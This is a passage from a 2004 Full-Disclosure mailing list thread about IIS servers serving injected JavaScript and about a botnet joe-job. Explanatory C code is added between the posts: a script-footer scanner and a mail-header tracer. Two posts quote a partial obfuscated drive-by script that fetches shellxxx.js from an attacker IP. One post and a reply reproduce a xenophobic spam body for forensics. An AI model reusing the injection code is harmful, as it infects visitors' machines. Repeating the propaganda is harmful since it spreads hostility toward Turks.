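 * /dev/null, format into a heap buffer that is exactly big enough, then copy
 * the bounded prefix out.  Needs C99 va_copy and a /dev/null. */
int devnull_vsnprintf(char *buf, size_t cap, const char *fmt, va_list ap)
{
    va_list ap2; char *tmp; int n;
    FILE *devnull = fopen("/dev/null", "w");
    if (!devnull) return -1;
    va_copy(ap2, ap);
    n = vfprintf(devnull, fmt, ap2);    /* counts, stores nothing */
    va_end(ap2);
    fclose(devnull);
    if (n < 0 || !(tmp = malloc((size_t)n + 1))) return -1;
    vsprintf(tmp, fmt, ap);             /* safe: tmp holds exactly n+1 bytes */
    if (cap > 0) {
        size_t keep = (size_t)n < cap - 1 ? (size_t)n : cap - 1;
        memcpy(buf, tmp, keep);
        buf[keep] = '\0';
    }
    free(tmp);
    return n;
}

/* Variadic fronts so both can be called like snprintf(). */
int my_snprintf(char *buf, size_t cap, const char *fmt, ...)
{
    va_list ap; int n;
    va_start(ap, fmt); n = my_vsnprintf(buf, cap, fmt, ap); va_end(ap);
    return n;
}
int devnull_snprintf(char *buf, size_t cap, const char *fmt, ...)
{
    va_list ap; int n;
    va_start(ap, fmt); n = devnull_vsnprintf(buf, cap, fmt, ap); va_end(ap);
    return n;
}
```

Two caveats worth keeping in mind. The mini formatter answers Valdis's "%#'LG" puzzle by refusing it outright (-1), which is the honest answer when you cannot compute the size; a wrapper that silently falls through to vsprintf is option 1, "discard and pray". The /dev/null route formats twice, so anything that changes between passes (a locale switch affecting the ' flag, a %n directive, a string another thread is editing) can make the second pass longer than the first and overrun tmp; it is a stop-gap for a missing function, not a replacement for a real vsnprintf.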


 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: Eric Paynter (ericarcticbears.com)
Date: Thu Jun 24 2004 - 17:31:47 CDT


On Thu, June 24, 2004 11:22 am, VX Dude said:
> Good point, personally I wouldn't think that making a
> small wrapper would take that long, but then again I
> haven't done it, and I haven't done it under stress and
> a time crunch. I code for fun and not profit which is
> pretty stress free.

Isn't the software we're talking about open source? Where's the profit and
time crunch? If it's a real concern, just fix it and submit your patch...

-Eric

--
arctic bears - affordable email and name services yourdomain.com
http://www.arcticbears.com



 
[Full-Disclosure] IE exploit runs code from graphics?

From: Larry Seltzer (larrylarryseltzer.com)
Date: Thu Jun 24 2004 - 18:02:01 CDT


From http://www.eweek.com/article2/0,,1617045,00.asp:

"Analysts at NetSec Inc., a managed security services provider, began seeing indications
of the compromises early Thursday morning and have since seen a large number of
identical attacks on their customers' networks. The attack uses a novel vector: embedded
code hidden in graphics on Web pages... NetSec officials said the attack seems to
exploit a vulnerability in Internet Explorer."



 
[Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Peter Kruse (krusekrusesecurity.dk)
Date: Thu Jun 24 2004 - 18:22:11 CDT


Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers were compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
      showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
trojan-downloader and run it.

Consider denying access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk



 
RE: [Full-Disclosure] IE exploit runs code from graphics?

From: Heather M. Guse Bryan (hbryandpntech.com)
Date: Thu Jun 24 2004 - 18:58:41 CDT


Is this related to the diary entry on:

http://www.incidents.org



 
[Full-Disclosure] Re: IE exploit runs code from graphics?

From: Joe Stewart (jstewartlurhq.com)
Date: Thu Jun 24 2004 - 19:57:45 CDT


On Thu, 24 Jun 2004 19:02:01, larrylarryseltzer.com wrote:
> From http://www.eweek.com/article2/0,,1617045,00.asp:
>
> "Analysts at NetSec Inc., a managed security services provider, began
> seeing indications of the compromises early Thursday morning and have
> since seen a large number of identical attacks on their customers' networks.
> The attack uses a novel vector: embedded code hidden in graphics on Web
> pages... NetSec officials said the attack seems to exploit a vulnerability
> in Internet Explorer."

This is somewhat misleading. The attack is appending javascript footers to
every file served by the IIS server, including image files. This isn't a new
vector, it's just a side-effect. More information at http://isc.sans.org/

-Joe

--
Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/

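A scanner for the symptom Joe and Peter describe, a script footer appended to every file the IIS server hands out, images included. This is an added example, not code from the thread, from SANS or from any of the posters. Two checks: a binary GIF, JPEG or PNG has no business containing a "<script" tag at all, and an HTML page has no business carrying one after its closing </html>. The sample files are constructed for the test and example.invalid stands in for the attacker's host; the scanner does not decode the obfuscated JavaScript, it only finds where it was glued on.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ASCII case-insensitive search for needle in d[from, len); -1 if absent.
 * Works on raw bytes, so embedded NULs in image data are no problem. */
static long find_ci(const unsigned char *d, size_t len, size_t from, const char *needle)
{
    size_t n = strlen(needle), i, j;
    for (i = from; i + n <= len; i++) {
        for (j = 0; j < n; j++) {
            unsigned char c = d[i + j];
            if (c >= 'A' && c <= 'Z')
                c += 'a' - 'A';
            if (c != (unsigned char)needle[j])
                break;
        }
        if (j == n)
            return (long)i;
    }
    return -1;
}

/* Offset of the last occurrence, same semantics. */
static long rfind_ci(const unsigned char *d, size_t len, const char *needle)
{
    long best = -1, pos = 0;
    while ((pos = find_ci(d, len, (size_t)pos, needle)) >= 0)
        best = pos++;
    return best;
}

/* GIF, JPEG or PNG by magic number; the extension is not trusted. */
static int looks_like_image(const unsigned char *d, size_t len)
{
    return (len >= 4 && memcmp(d, "GIF8", 4) == 0)
        || (len >= 3 && d[0] == 0xFF && d[1] == 0xD8 && d[2] == 0xFF)
        || (len >= 8 && memcmp(d, "\x89PNG\r\n\x1a\n", 8) == 0);
}

/* Offset of an injected "<script" in a served file, or -1 if nothing found.
 * Images: any <script> tag at all is foreign.  HTML: only a tag after the
 * last </html> counts, since pages legitimately carry script before it; a
 * page without </html> cannot be judged this way and is reported clean. */
long find_script_footer(const unsigned char *d, size_t len)
{
    long html_end;
    if (looks_like_image(d, len))
        return find_ci(d, len, 0, "<script");
    html_end = rfind_ci(d, len, "</html>");
    return html_end < 0 ? -1 : find_ci(d, len, (size_t)html_end, "<script");
}

/* Slurp a file and check it; -2 if it cannot be read. */
long scan_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    unsigned char *buf;
    long n, r = -2;
    if (!f)
        return -2;
    if (fseek(f, 0, SEEK_END) == 0 && (n = ftell(f)) >= 0 && (buf = malloc((size_t)n + 1))) {
        rewind(f);
        if (fread(buf, 1, (size_t)n, f) == (size_t)n)
            r = find_script_footer(buf, (size_t)n);
        free(buf);
    }
    fclose(f);
    return r;
}

/* Constructed samples (not real captures): a minimal GIF with a script tag
 * appended, the same GIF clean, and an HTML page with a footer after </html>. */
static const unsigned char infected_gif[] =
    "GIF89a\x01\x00\x01\x00\x80\x00\x00;"
    "<SCRIPT src=\"http://example.invalid/x.js\"></SCRIPT>";
static const unsigned char clean_gif[] = "GIF89a\x01\x00\x01\x00\x80\x00\x00;";
static const unsigned char infected_html[] =
    "<html><body><script>ok()</script></body></html>\r\n"
    "<script src=\"http://example.invalid/x.js\"></script>";
static const unsigned char clean_html[] =
    "<html><body><script>ok()</script></body></html>\n";

int main(int argc, char **argv)
{
    int i;
    if (argc == 1)      /* no paths given: show the constructed samples */
        printf("gif %ld / %ld, html %ld / %ld\n",
               find_script_footer(infected_gif, sizeof infected_gif - 1),
               find_script_footer(clean_gif, sizeof clean_gif - 1),
               find_script_footer(infected_html, sizeof infected_html - 1),
               find_script_footer(clean_html, sizeof clean_html - 1));
    for (i = 1; i < argc; i++) {
        long r = scan_file(argv[i]);
        if (r == -2)      printf("%s: unreadable\n", argv[i]);
        else if (r < 0)   printf("%s: clean\n", argv[i]);
        else              printf("%s: injected <script at byte %ld\n", argv[i], r);
    }
    return 0;
}
```

Run it over everything under the webroot (find . -type f | xargs ./scanner) rather than over *.htm only: as Joe notes, the footer rides on whatever the server serves, and the image files are the ones nobody thinks to look inside. A hit on a .gif is close to proof; a hit after </html> should be read in context, since a sloppy but legitimate page can put a tracker there too.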


 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Thu Jun 24 2004 - 20:10:46 CDT


"Peter Kruse" <krusekrusesecurity.dk> wrote:

> This is a heads up.

Or...

PANIC, PANIC, PANIC...

> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers were compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).

There is _no_ evidence (yet) that this is spreading from "infected" IIS
servers. _Some_ IIS admins whose servers are involved don't know how
the content got on their servers, but that is far from grounds for
claiming said servers are, or even may be, "infected". Of course they
might be, but history suggests that slack admin'ing is at least as
likely as an explanation...

> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> <script language="Javascript">
>
> function InjectedDuringRedirection(){
>  showModalDialog('md.htm', window, "dialog
> Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
> :1\;").location= " java script:'<SCRIPT SRC =\\' http://
> 217.107.218.147/shellxxx.js\\'> <\ /script>'";
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
> trojan-downloader and run it.

It does this via the now very old ms-its: protocol zone-handling bug...
Apparently someone needs to decode a few more levels of JavaScript, etc
to work this all out...

> Consider denying access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.

Thanks Peter, but what about all the _other_ servers out there also
hosting more or less exactly the same files? Are you going to provide
a list of all those IPs too?

I've seen several (probably 5 or 6 others) in the last week or so with
all the same files or just one difference (ignoring the trivial script
differences necessitated by referring to different hosts) -- the .EXE
that is eventually downloaded is a different variant.

> Further information can be found in the daily log from SANS:
> http://isc.sans.org/

Woohoo -- SANS incident handlers have reported one incident of this
they know about so the sky must be falling!

Next...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



 
Re: [Full-Disclosure] IE exploit runs code from graphics?

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Thu Jun 24 2004 - 20:43:54 CDT


"Larry Seltzer" <larrylarryseltzer.com> wrote:

> From http://www.eweek.com/article2/0,,1617045,00.asp:
>
> "Analysts at NetSec Inc., a managed security services provider,
> began seeing indications of the compromises early Thursday morning
> and have since seen a large number of identical attacks on their
> customers' networks. The attack uses a novel vector: embedded code
> hidden in graphics on Web pages... NetSec officials said the attack
> seems to exploit a vulnerability in Internet Explorer."

Without having access to any of the information as to what web pages
NetSec thinks are involved, but having seen many recent posts about the
so-called "RFI - Russian IIS Hacks" I'd suggest that both reports are
referring to one and the same, or at least, very closely related,
things.

Common exploits of the ms-its: (etc) protocol download compiled help
files (.CHM) from some web site, causing the HTML code inside the .CHM
to be run in the "My Computer" security zone. Typically (like all but
one of _dozens and dozens_ of these I've seen) the "inner" HTML run
from the .CHM then uses a lightly modified form of one of the common
ADODB.Stream PoC exploits to download yet another file, save it as a
.EXE and run it. Sometimes the file the ADODB exploit code pulls down
will be named with a .GIF or .JPG extension (it can be _any_ extension
the attacker likes as the ADODB.Stream vuln allows the attacker to
specify the target filename and path on the new victim machine _in
full_).

That is hardly the same thing as "embedded code hidden in graphics on
Web pages", but I can easily imagine a naïve journalist getting
confused over such technical issues or a company representative
hankering for some media exposure over-selling the seriousness or
novelty of what they "discovered"...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



 
RE: [Full-Disclosure] IE exploit runs code from graphics?

From: Larry Seltzer (larrylarryseltzer.com)
Date: Thu Jun 24 2004 - 21:12:31 CDT


>> Without having access to any of the information as to what web pages NetSec
>> thinks is involved, but having seen many recent posts about the so-called
>> "RFI - Russian IIS Hacks" I'd suggest that both reports are referring to one
>> and the same, or at least, very closely related, things.
>> ...
>> That is hardly the same thing as "embedded code hidden in graphics on Web pages"...

Yup, once I saw the SANS writeups I came to the same conclusion. So there's nothing
really new in the client-side exploit and what's happening on the server hasn't been
figured out yet, right? And it sounds like if you're up to date on patches and antivirus
you're probably protected against the client-side exploit.

Larry Seltzer



 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Thu Jun 24 2004 - 22:34:53 CDT




> Yesterday a large client of ours was taken down by what appears to be a
> Korgo variant, but I have been unable to locate any information on this
> worm. From what we have discovered, the main process is 'VDisp.exe'. It is
> spreading through unpatched systems vulnerable to the LSASS exploit, and
> propagates itself through a series of randomly chosen ports. The worm
> creates randomly generated services that initialize the process, and also
> creates a registry entry in RunServices and Run to load. I am anxious to
> hear any feedback anyone has regarding this issue as we are still
> attempting to reduce network traffic and alleviate any remaining issues. I
> have attached a copy of the executable (rename to .exe).

Where is the .exe file? If possible, write a Snort sig for this to isolate
which machines are infected and patch them. For the services: if you find
any unfamiliar services, simply stop them and set the autostart to disabled.
Also make a script like this and just run it from the login script, so that
it runs on all the machines; if possible, put the patch in this script as
well.

-Aditya



 
[Full-Disclosure] defamatory joe job attack by botnet

From: lsi (stuartcyberdelix.net)
Date: Thu Jun 24 2004 - 22:43:20 CDT


On June 11 it was reported that Dutch mailboxes were flooded with racist
hatemail sent via the Sobig worm.

http://www.theregister.co.uk/2004/06/11/german_hate_mail_virus/

I can report that not only is this activity continuing, but it is
doing so under the names of ... well, me, at least - I have received
several bounces indicating that my email address is being used as the
"from" address.

I include the full text of a sample bounce below. Note: the text is
reportedly racist in nature. I include it for forensic purposes.
This is the full disclosure list, right?

Maybe it was just me who got joe-jobbed by Sobig in this way? Or
maybe there are some other posters to the security conferences who
are being toasted too?

Note: 82.3.47.243 is apparently a cable connection owned by NTL UK.
Probably just an owned box though. And probably a dynamic IP as
well.

Stuart

[ok, I trimmed these headers, irrelevant]
Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
From: MAILER-DAEMONpfmx1.pop.uk.netscalibur.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: stuartcyberdelix.net

This is a MIME-encapsulated message.

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host pfmx1.pop.uk.netscalibur.com.

I'm sorry to have to inform you that the message returned
below could not be delivered to one or more destinations.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the message returned below.

                        The Postfix program

<louisecyrus02.pop.uk.netscalibur.com>: host
    cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
    quota (in reply to RCPT TO command)

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
Content-Description: Delivery error report
Content-Type: message/delivery-status

Reporting-MTA: dns; pfmx1.pop.uk.netscalibur.com
Arrival-Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)

Final-Recipient: rfc822; louisecyrus02.pop.uk.netscalibur.com
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; host
    cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
    quota (in reply to RCPT TO command)

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
        by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id 69D9D6749F5
        for <louisedircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
Received: from qmx0.uk.netscalibur.com (qmx0.uk.netscalibur.com [194.112.32.44])
        by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
        with SMTP id AVI60539;
        Thu, 24 Jun 2004 13:04:08 +0100 (BST)
Received: (qmail 95729 invoked from network); 24 Jun 2004 12:04:33 -0000
Cc: recipient list not shown: ;
Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
  by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun 2004 12:04:30 -0000
From: stuartcyberdelix.net
Date: Thu, 24 Jun 2004 11:33:35 GMT
MIME-Version: 1.0
Subject: EU Beitritt der Tuerkei ? (Id:9951)
Importance: Normal
X-Priority: 3 (Normal)
Message-ID: <4148b811e04d28.e372b.qmailcyberdelix.net>
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"

Opening accession negotiations with Turkey or not - a decision that could mean 'the end of Europe'. Those words come from the former French president Giscard d'Estaing.
As early as 2002 he warned that Turkey's accession to the EU would amount to the 'end of Europe'. The West German advocates of accession suppress and conceal the unforeseeable consequences of this decision:

(1) Turkey already has 70 million inhabitants. By the time it joins the EU it will have overtaken the FRG in population and will receive the corresponding voting weight in the EU institutions.
(2) Economically, Turkey does not fit into the EU. The country is hopelessly over-indebted and would long since be bankrupt without constant international loans. Per-capita income is only 23% of the EU average. The EU subsidies Turkey would be entitled to would not only blow the Brussels budget apart but would also completely ruin the already over-indebted 'donor countries' such as the FRG.
(3) By admitting an Asian country and giving up sensible external borders, the EU loses its identity.

Despite these indisputable explosive points, the campaign for Turkish accession rolls on ever faster and more unstoppably: the Turkish head of government Erdogan already takes part in the conferences of EU heads of government, admittedly without voting rights as yet, and Turkey already receives EU money for 'accession preparation'.
It is all just like the introduction of the euro: first the whole plan seems unrealistic and many consider it unworkable; then an open discussion of the pros and cons is criminalised as 'anti-European or xenophobic'; and finally the decision is taken behind closed doors, without the participation of the democratic sovereign and without a referendum, and declared irreversible.
The same game with the preconditions: with the euro it was the Maastricht criteria, which were not met even before 1999 and are by now openly disregarded. The Turkey criteria are called: reunification of Cyprus (as if that were so important), human rights, democratisation. Nothing prevents Ankara from fulfilling these conditions pro forma. Even if they were fulfilled, the fundamental arguments against Turkish accession listed above would not be refuted in the slightest.
A nasty game that feeds the suspicion that a conspiracy against Germany and Europe is being hatched here. Berlin has already committed itself without any mandate from the voters. Should accession fail, Foreign Minister Fischer said according to 'WamS' of 8 Feb. 2004, one would 'pay a very high price' for it.

A sentence one has to read twice. Fischer is threatening the German people. What the high price would consist of, he does not say. Perhaps he means that the Turks living in Germany could take to the streets. Or he fears the wrath of the USA, which has been demanding accession for years. Washington knows very well that admitting Asia Minor could lead to a 'bankrupt halt' of the whole EU (according to the 'Financial Times' of 15 Jan. 2004). The 'International Herald Tribune' of 24 Nov. 2003 judges quite soberly:

'That the population is shrinking throughout Europe means that still more immigration lies ahead. Admitting Turkey as an EU member would accelerate this trend and irrevocably change the definition of Europe ... Many Europeans have yet to accept that the traditionally white, Christian culture of their forefathers is being replaced by a multicultural mix with a strong Islamic weighting.'

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com--

-- End --
------- End of forwarded message -------

---
Stuart Udall
stuart atcyberdelix.dot net - http://www.cyberdelix.net/

---
 * Origin: lsi: revolution through evolution (192.168.0.2)

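The reasoning behind Stuart's "82.3.47.243 is ... probably just an owned box" is a walk down the Received: chain of the bounced message, and the following added example does that walk in code. It is not code from the post or from any of the MTAs named in it. Received: headers are prepended as mail travels, so the last one in the block is the first hop the victim's MTA saw; everything the sender wrote (the HELO name yddcfxtx.net, the forged From:) is free text, but the address the receiving MTA recorded in that header is what it actually connected from. The sample headers are copied from the bounce above, trimmed to the lines that matter; the parser assumes the literal spelling "Received:" and IPv4 addresses only.

```c
#include <stdio.h>
#include <string.h>

#define IP_LEN 16   /* "255.255.255.255" plus NUL */

/* If s starts with a dotted quad (each octet 1-3 digits, <= 255) that is not
 * glued to further digits, copy it to out and return its length; else 0. */
static int ipv4_at(const char *s, char *out)
{
    const char *p = s;
    int octet;
    for (octet = 0; octet < 4; octet++) {
        int v = 0, nd = 0;
        while (*p >= '0' && *p <= '9' && nd < 3) {
            v = v * 10 + (*p++ - '0');
            nd++;
        }
        if (nd == 0 || v > 255 || (octet < 3 && *p++ != '.'))
            return 0;
    }
    if (*p == '.' || (*p >= '0' && *p <= '9') || p - s >= IP_LEN)
        return 0;
    memcpy(out, s, (size_t)(p - s));
    out[p - s] = '\0';
    return (int)(p - s);
}

/* First dotted quad in a header line whose preceding byte is not part of a
 * longer number, so "MOS 3.3.5-GR" or a queue id never matches. */
static int first_ipv4(const char *line, char *out)
{
    size_t i;
    for (i = 0; line[i]; i++) {
        char prev = i ? line[i - 1] : ' ';
        if ((prev >= '0' && prev <= '9') || prev == '.')
            continue;
        if (ipv4_at(line + i, out))
            return 1;
    }
    return 0;
}

/* Walk the header block top down.  ips[k] gets the first address in the
 * k-th Received: header (folded continuation lines included), or "" if that
 * hop recorded none.  Returns the number of Received: headers seen. */
int trace_received(const char *hdrs, char ips[][IP_LEN], int max)
{
    int hops = 0, in_received = 0, found = 0;
    const char *p = hdrs;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t n = eol ? (size_t)(eol - p) : strlen(p);
        char line[512];
        if (n == 0)
            break;                          /* blank line ends the headers */
        if (n >= sizeof line)
            n = sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        if (line[0] == ' ' || line[0] == '\t') {
            if (in_received && !found)      /* folded continuation line */
                found = first_ipv4(line, ips[hops - 1]);
        } else if (strncmp(line, "Received:", 9) == 0) {
            if (hops == max)
                break;
            ips[hops][0] = '\0';
            found = first_ipv4(line, ips[hops]);
            in_received = 1;
            hops++;
        } else {
            in_received = 0;
        }
        if (!eol)
            break;
        p = eol + 1;
    }
    return hops;
}

/* The injecting host: the address from the earliest hop that recorded one. */
const char *origin_ip(char ips[][IP_LEN], int hops)
{
    while (hops-- > 0)
        if (ips[hops][0])
            return ips[hops];
    return NULL;
}

/* The Received: chain from the bounce quoted above (recipient address dropped). */
static const char sample_headers[] =
    "Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])\n"
    "        by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id 69D9D6749F5;\n"
    "        Thu, 24 Jun 2004 13:05:42 +0100 (BST)\n"
    "Received: from qmx0.uk.netscalibur.com (qmx0.uk.netscalibur.com [194.112.32.44])\n"
    "        by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)\n"
    "        with SMTP id AVI60539; Thu, 24 Jun 2004 13:04:08 +0100 (BST)\n"
    "Received: (qmail 95729 invoked from network); 24 Jun 2004 12:04:33 -0000\n"
    "Cc: recipient list not shown: ;\n"
    "Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)\n"
    "  by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun 2004 12:04:30 -0000\n"
    "Date: Thu, 24 Jun 2004 11:33:35 GMT\n"
    "\n"
    "body follows\n";

int main(void)
{
    char ips[16][IP_LEN];
    int n = trace_received(sample_headers, ips, 16), i;
    for (i = 0; i < n; i++)
        printf("hop %d from the top: %s\n", i, ips[i][0] ? ips[i] : "(no address recorded)");
    printf("origin: %s\n", origin_ip(ips, n) ? origin_ip(ips, n) : "unknown");
    return 0;
}
```

The third hop is a qmail local handoff with no address, which is why the walk takes the last hop that recorded one rather than blindly the last header. Only the chain inside the bounced copy is trustworthy back to the victim's own MTA; a spammer can prepend fake Received: lines of his own, so the bottom of the list is only evidence if the hop above it was written by a server you trust.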


 
RE: [Full-Disclosure] defamatory joe job attack by botnet

From: Kane Lightowler (Kanecontentsecurity.com.au)
Date: Thu Jun 24 2004 - 23:10:25 CDT


I can also confirm that this is continuing from one of my many email addresses also.

Regards,

Kane Lightowler
Network Security Consultant

Content Security
Level 4, Suite 42c
203 Castlereagh Street
Sydney 2000

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com]On Behalf Of lsi
> Sent: Friday, June 25, 2004 1:43 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] defamatory joe job attack by botnet
>
>
> On June 11 it was reported that Dutch mailboxes were flooded
> with racist
> hatemail sent via the Sobig worm.
>
> http://www.theregister.co.uk/2004/06/11/german_hate_mail_virus/
>
> I can report that not only is this activity continuing, but it is
> doing so under the names of ... well, me, at least - I have received
> several bounces indicating that my email address is being used as the
> "from" address.
>
> I include the fulltext of a sample bounce below. Note: the text is
> reportedly racist in nature. I include it for forensic purposes.
> This is the full disclosure list, right?
>
> Maybe it was just me who got joe-jobbed by Sobig in this way? Or
> maybe there are some other posters to the security conferences who
> are being toasted too?
>
> Note: 82.3.47.243 is apparently a cable connection owned by NTL UK.
> Probably just an owned box though. And probably a dynamic IP as
> well.
>
> Stuart
>
> [ok, I trimmed these headers, irrelevant]
> Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
> From: MAILER-DAEMONpfmx1.pop.uk.netscalibur.com (Mail
> Delivery System)
> Subject: Undelivered Mail Returned to Sender
> To: stuartcyberdelix.net
>
> This is a MIME-encapsulated message.
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
> Content-Description: Notification
> Content-Type: text/plain
>
> This is the Postfix program at host pfmx1.pop.uk.netscalibur.com.
>
> I'm sorry to have to inform you that the message returned
> below could not be delivered to one or more destinations.
>
> For further assistance, please send mail to <postmaster>
>
> If you do so, please include this problem report. You can
> delete your own text from the message returned below.
>
> The Postfix program
>
> <louisecyrus02.pop.uk.netscalibur.com>: host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said:
> 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
> Content-Description: Delivery error report
> Content-Type: message/delivery-status
>
> Reporting-MTA: dns; pfmx1.pop.uk.netscalibur.com
> Arrival-Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>
> Final-Recipient: rfc822; louisecyrus02.pop.uk.netscalibur.com
> Action: failed
> Status: 5.0.0
> Diagnostic-Code: X-Postfix; host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said:
> 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
> Content-Description: Undelivered Message
> Content-Type: message/rfc822
> Content-Transfer-Encoding: 8bit
>
> Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
> by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id
> 69D9D6749F5
> for <louisedircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
> Received: from qmx0.uk.netscalibur.com
> (qmx0.uk.netscalibur.com [194.112.32.44])
> by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
> with SMTP id AVI60539;
> Thu, 24 Jun 2004 13:04:08 +0100 (BST)
> Received: (qmail 95729 invoked from network); 24 Jun 2004
> 12:04:33 -0000
> Cc: recipient list not shown: ;
> Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
> by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun
> 2004 12:04:30 -0000
> From: stuartcyberdelix.net
> Date: Thu, 24 Jun 2004 11:33:35 GMT
> MIME-Version: 1.0
> Subject: EU Beitritt der Tuerkei ? (Id:9951)
> Importance: Normal
> X-Priority: 3 (Normal)
> Message-ID: <4148b811e04d28.e372b.qmailcyberdelix.net>
> Content-Transfer-Encoding: 7bit
> Content-Type: text/plain; charset="us-ascii"
>
> To open accession negotiations with Turkey or not - a
> decision that could mean 'the end of Europe'. The phrase
> comes from former French President Giscard d'Estaing.
> As early as 2002 he warned that Turkey's accession to the
> EU would amount to the 'end of Europe'. The German
> advocates of accession suppress and conceal the
> unforeseeable consequences of this decision:
>
> (1) Turkey already has 70 million inhabitants. By the time
> it joins the EU it will have overtaken the FRG in
> population and will receive the corresponding voting
> weight in the EU institutions.
> (2) Economically, Turkey does not fit into the EU. The
> country is hopelessly over-indebted and would long since
> be bankrupt without constant international credit.
> Per-capita income is only 23% of the EU average. The EU
> subsidies to which Turkey would be entitled would not only
> blow the Brussels budget apart but also completely ruin
> the already over-indebted 'donor countries' such as the
> FRG.
> (3) By admitting an Asian country and giving up sensible
> external borders, the EU loses its identity.
>
> Despite these indisputable explosive charges, the campaign
> for Turkish accession rolls on ever faster and more
> unstoppably: Turkish head of government Erdogan already
> takes part in the conferences of the EU heads of
> government, admittedly still without a vote, and Turkey is
> already receiving EU money for 'accession preparation'.
> It is all like the introduction of the euro: first the
> whole plan looks unrealistic and many consider it
> unworkable; then open discussion of the pros and cons is
> criminalised as 'anti-European or xenophobic'; and finally
> the decision is taken behind closed doors, without the
> participation of the democratic sovereign and without a
> referendum, and declared irreversible.
> The same game with the preconditions: for the euro it was
> the Maastricht criteria, which were not met even before
> 1999 and are now openly disregarded. The Turkey criteria
> are: reunification of Cyprus (as if that were so
> important), human rights, democratisation. Nothing stops
